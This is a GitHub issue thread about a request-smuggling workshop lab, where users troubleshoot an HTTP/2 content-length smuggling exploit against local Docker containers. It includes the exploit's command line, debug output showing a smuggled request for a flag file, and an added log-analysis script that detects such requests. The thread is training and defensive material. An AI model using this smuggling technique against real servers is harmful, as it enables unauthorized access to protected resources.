
LAB2 always returns 404

Open vbrazauskas opened this issue 3 years ago • 4 comments

Hi, I was running LAB2, but I was not able to get successful results. The Python script always returned 404 and HRS result false:
[+] Request 1 /static/diagram_full_size.png => 200
[+] Request 2 /static/not_found => 404
[+] HRS successful: False

Tried this setup on a couple of different Linux servers, but in both cases no success. Happy to show if needed.

vbrazauskas, May 04 '22 21:05

Tagging @h3xstream if he can support you.

obilodeau, May 05 '22 01:05

@vbrazauskas Can you provide the output from the Docker logs? It will be possible to see what requests are reaching the backend.

One of the common issues is the new lines being malformed in the smuggled request. I had several cases where this bit me, so that's why there is the monstrosity of chained replace functions. https://github.com/GoSecure/request-smuggling-workshop/blob/26aee456e4ea97838f089ea7ada92a80c669deb1/02_http2_cl/exploit_http2_hrs.py#L5-L9

h3xstream, May 19 '22 01:05

@h3xstream Hi, the LAB2 returns 404

DOCKER LOG:
[+] Running 3/0
 ⠿ Container 02_http2_cl-webstatic-1 Created 0.0s
 ⠿ Container 02_http2_cl-webmain-1 Created 0.0s
 ⠿ Container 02_http2_cl-armeria-1 Created 0.0s
Attaching to 02_http2_cl-armeria-1, 02_http2_cl-webmain-1, 02_http2_cl-webstatic-1
02_http2_cl-webstatic-1 | AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.18.0.4. Set the 'ServerName' directive globally to suppress this message
02_http2_cl-webmain-1 | AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.18.0.3. Set the 'ServerName' directive globally to suppress this message
02_http2_cl-webstatic-1 | AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.18.0.4. Set the 'ServerName' directive globally to suppress this message
02_http2_cl-webmain-1 | AH00558: apache2: Could not reliably determine the server's fully qualified domain name, using 172.18.0.3. Set the 'ServerName' directive globally to suppress this message
02_http2_cl-webstatic-1 | [Mon May 01 14:52:51.508159 2023] [mpm_prefork:notice] [pid 1] AH00163: Apache/2.4.51 (Debian) PHP/8.0.13 configured -- resuming normal operations
02_http2_cl-webstatic-1 | [Mon May 01 14:52:51.508275 2023] [core:notice] [pid 1] AH00094: Command line: 'apache2 -D FOREGROUND'
02_http2_cl-webmain-1 | [Mon May 01 14:52:51.509925 2023] [mpm_prefork:notice] [pid 1] AH00163: Apache/2.4.51 (Debian) PHP/8.0.13 configured -- resuming normal operations
02_http2_cl-webmain-1 | [Mon May 01 14:52:51.510042 2023] [core:notice] [pid 1] AH00094: Command line: 'apache2 -D FOREGROUND'
02_http2_cl-armeria-1 | SLF4J: Failed to load class "org.slf4j.impl.StaticLoggerBinder".
02_http2_cl-armeria-1 | SLF4J: Defaulting to no-operation (NOP) logger implementation
02_http2_cl-armeria-1 | SLF4J: See http://www.slf4j.org/codes.html#StaticLoggerBinder for further details.
02_http2_cl-webstatic-1 | 172.18.0.2 - - [01/May/2023:14:52:53 +0000] "PRI * HTTP/2.0" 400 484 "-" "-"
02_http2_cl-webstatic-1 | 172.18.0.2 - - [01/May/2023:14:52:53 +0000] "HEAD /static/ HTTP/1.1" 200 127 "-" "armeria/1.13.2"
02_http2_cl-webmain-1 | 172.18.0.2 - - [01/May/2023:14:52:58 +0000] "PRI * HTTP/2.0" 400 484 "-" "-"
02_http2_cl-webmain-1 | 172.18.0.2 - - [01/May/2023:14:52:58 +0000] "HEAD / HTTP/1.1" 200 154 "-" "armeria/1.13.2"
02_http2_cl-webstatic-1 | 172.18.0.2 - - [01/May/2023:14:53:02 +0000] "HEAD /static/ HTTP/1.1" 200 127 "-" "armeria/1.13.2"
02_http2_cl-webmain-1 | 172.18.0.2 - - [01/May/2023:14:53:09 +0000] "HEAD / HTTP/1.1" 200 154 "-" "armeria/1.13.2"
02_http2_cl-webstatic-1 | 172.18.0.2 - - [01/May/2023:14:53:13 +0000] "HEAD /static/ HTTP/1.1" 200 127 "-" "armeria/1.13.2"
02_http2_cl-webmain-1 | 172.18.0.2 - - [01/May/2023:14:53:19 +0000] "HEAD / HTTP/1.1" 200 154 "-" "armeria/1.13.2"
02_http2_cl-webstatic-1 | 172.18.0.2 - - [01/May/2023:14:53:20 +0000] "POST /static/diagram_full_size.png HTTP/1.1" 200 41212 "-" "python-httpx/0.24.0"
02_http2_cl-webstatic-1 | 172.18.0.2 - - [01/May/2023:14:53:20 +0000] "GET /static/not_found HTTP/1.1" 404 432 "-" "python-httpx/0.24.0"
02_http2_cl-webstatic-1 | 172.18.0.2 - - [01/May/2023:14:53:24 +0000] "HEAD /static/ HTTP/1.1" 200 127 "-" "armeria/1.13.2"
02_http2_cl-webmain-1 | 172.18.0.2 - - [01/May/2023:14:53:30 +0000] "HEAD / HTTP/1.1" 200 154 "-" "armeria/1.13.2"
02_http2_cl-webstatic-1 | 172.18.0.2 - - [01/May/2023:14:53:34 +0000] "HEAD /static/ HTTP/1.1" 200 127 "-" "armeria/1.13.2"
02_http2_cl-webmain-1 | 172.18.0.2 - - [01/May/2023:14:53:40 +0000] "HEAD / HTTP/1.1" 200 154 "-" "armeria/1.13.2"
02_http2_cl-webstatic-1 | 172.18.0.2 - - [01/May/2023:14:53:45 +0000] "HEAD /static/ HTTP/1.1" 200 127 "-" "armeria/1.13.2"
02_http2_cl-webmain-1 | 172.18.0.2 - - [01/May/2023:14:53:50 +0000] "HEAD / HTTP/1.1" 200 154 "-" "armeria/1.13.2"
02_http2_cl-webstatic-1 | 172.18.0.2 - - [01/May/2023:14:53:56 +0000] "HEAD /static/ HTTP/1.1" 200 127 "-" "armeria/1.13.2"
02_http2_cl-webmain-1 | 172.18.0.2 - - [01/May/2023:14:54:01 +0000] "HEAD / HTTP/1.1" 200 154 "-" "armeria/1.13.2"
02_http2_cl-webstatic-1 | 172.18.0.2 - - [01/May/2023:14:54:06 +0000] "HEAD /static/ HTTP/1.1" 200 127 "-" "armeria/1.13.2"
02_http2_cl-webmain-1 | 172.18.0.2 - - [01/May/2023:14:54:10 +0000] "HEAD / HTTP/1.1" 200 154 "-" "armeria/1.13.2"
02_http2_cl-webstatic-1 | 172.18.0.2 - - [01/May/2023:14:54:16 +0000] "HEAD /static/ HTTP/1.1" 200 127 "-" "armeria/1.13.2"
02_http2_cl-webmain-1 | 172.18.0.2 - - [01/May/2023:14:54:22 +0000] "HEAD / HTTP/1.1" 200 154 "-" "armeria/1.13.2"
02_http2_cl-webstatic-1 | 172.18.0.2 - - [01/May/2023:14:54:25 +0000] "HEAD /static/ HTTP/1.1" 200 127 "-" "armeria/1.13.2"
02_http2_cl-webstatic-1 | 172.18.0.2 - - [01/May/2023:14:54:33 +0000] "HEAD /static/ HTTP/1.1" 200 127 "-" "armeria/1.13.2"
02_http2_cl-webmain-1 | 172.18.0.2 - - [01/May/2023:14:54:33 +0000] "HEAD / HTTP/1.1" 200 154 "-" "armeria/1.13.2"
02_http2_cl-webstatic-1 | 172.18.0.2 - - [01/May/2023:14:54:42 +0000] "HEAD /static/ HTTP/1.1" 200 127 "-" "armeria/1.13.2"
02_http2_cl-webmain-1 | 172.18.0.2 - - [01/May/2023:14:54:42 +0000] "HEAD / HTTP/1.1" 200 154 "-" "armeria/1.13.2"

RUNNING THE PYTHON TOOL:
python3 exploit_http2_hrs.py --host https://localhost:8443/ --url1 /static/diagram_full_size.png --url1s /documents/flag.txt --url2 /static/not_found
[+] Request 1 /static/diagram_full_size.png => 200
[+] Request 2 /static/not_found => 404
[+] HRS successful: False
[+] Response from second request: b'\n
\n404 Not Found\n\n
Not Found
\n
The requested URL was not found on this server.
\n
\n
Apache/2.4.51 (Debian) Server at webstatic Port 80
\n\n'

venkatynw, May 01 '23 14:05

Same problem running Docker Compose 2.27.0 on Kali 2024.2, but I don't think this is the problem. The exploit output follows:

python exploit_http2_hrs.py --host https://localhost:8443 --url1 /static/style.css --url1s /documents/flag.txt --url2 /not/found --debug
 [+] Request 1 /static/style.css => 200
 [+] Request 2 /not/found => 404
 [+] HRS successful: False
Request 1:
{{{{
POST https://localhost:8443/static/style.css HTTP/2
host: localhost:8443
accept: */*
accept-encoding: gzip, deflate, br
connection: keep-alive
user-agent: python-httpx/0.27.0
content-length: 0

b'GET /documents/flag.txt HTTP/1.1\r\nHost: localhost\r\n\r\n'
}}}}
Request 2:
{{{{
GET https://localhost:8443/not/found HTTP/2
host: localhost:8443
accept: */*
accept-encoding: gzip, deflate, br
connection: keep-alive
user-agent: python-httpx/0.27.0

b''
}}}}
 [+] Response from second request:
b'<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">\n<html><head>\n<title>404 Not Found</title>\n</head><body>\n<h1>Not Found</h1>\n<p>The requested URL was not found on this server.</p>\n<hr>\n<address>Apache/2.4.51 (Debian) Server at webmain Port 80</address>\n</body></html>\n'

From the Docker console I got 200 indeed:

...
webstatic-1  | 172.18.0.3 - - [05/Jun/2024:21:23:28 +0000] "POST /static/style.css HTTP/1.1" 200 0 "-" "python-httpx/0.27.0"
webstatic-1  | 172.18.0.3 - - [05/Jun/2024:21:23:28 +0000] "GET /documents/flag.txt HTTP/1.1" 200 2463 "-" "-"
webmain-1    | 172.18.0.3 - - [05/Jun/2024:21:23:28 +0000] "GET /not/found HTTP/1.1" 404 430 "-" "python-httpx/0.27.0"
...

I'm not particularly interested in making the script work, but I would greatly appreciate any indications about how to retrieve the content of the smuggled request.

Thank you

zinzloun, Jun 05 '24 21:06
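The three backend log lines zinzloun posted show what the desync looks like from the defender's side: right after a zero-length POST, webstatic logs a request in the same second with no User-Agent at all, on a path outside the /static/ prefix that the front-end sends to it. The script below is an added example, not part of this thread or of the workshop code; it runs that heuristic over combined-format Apache lines, and the prefix-to-backend mapping it uses is an assumption inferred from the logs above.

```python
import re

# Apache "combined" access-log line, optionally prefixed by the docker compose
# container name as in the thread ("webstatic-1  | ...").
LOG_RE = re.compile(
    r'^(?:(?P<container>\S+)\s+\|\s+)?(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) '
    r'(?P<size>\d+|-) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

# Constructed sample: the three lines zinzloun posted plus one armeria health check.
SAMPLE_LOG = """\
webstatic-1  | 172.18.0.3 - - [05/Jun/2024:21:23:28 +0000] "POST /static/style.css HTTP/1.1" 200 0 "-" "python-httpx/0.27.0"
webstatic-1  | 172.18.0.3 - - [05/Jun/2024:21:23:28 +0000] "GET /documents/flag.txt HTTP/1.1" 200 2463 "-" "-"
webmain-1    | 172.18.0.3 - - [05/Jun/2024:21:23:28 +0000] "GET /not/found HTTP/1.1" 404 430 "-" "python-httpx/0.27.0"
webstatic-1  | 172.18.0.3 - - [05/Jun/2024:21:23:34 +0000] "HEAD /static/ HTTP/1.1" 200 127 "-" "armeria/1.13.2"
"""

# Assumed routing table (hypothetical, inferred from the logs in the thread):
# the front-end only sends /static/ to webstatic and everything else to webmain.
EXPECTED_PREFIX = {"webstatic-1": "/static/", "webmain-1": "/"}


def parse(lines):
    """Return one dict per line that matches the combined format; skip the rest."""
    return [m.groupdict() for m in map(LOG_RE.match, lines) if m]


def find_suspects(log_text):
    """Flag requests that look desynchronised from the front-end's point of view:
    same backend and source IP as the previous entry, logged in the same second
    right after a POST, no User-Agent at all, and a path the front-end would not
    have routed to this backend. Returns (container, method, path, status) tuples."""
    entries = parse(log_text.splitlines())
    suspects = []
    for prev, cur in zip(entries, entries[1:]):
        same_origin = prev["container"] == cur["container"] and prev["ip"] == cur["ip"]
        same_second = prev["ts"] == cur["ts"]
        no_ua = cur["ua"] in ("", "-")
        misrouted = not cur["path"].startswith(EXPECTED_PREFIX.get(cur["container"], "/"))
        if same_origin and same_second and prev["method"] == "POST" and no_ua and misrouted:
            suspects.append((cur["container"], cur["method"], cur["path"], cur["status"]))
    return suspects


if __name__ == "__main__":
    for hit in find_suspects(SAMPLE_LOG):
        print("possible smuggled request:", hit)
```

The same mismatch explains why the second request in that run could not pick up the smuggled response: /not/found was routed to webmain, while the smuggled GET was answered on the webstatic connection.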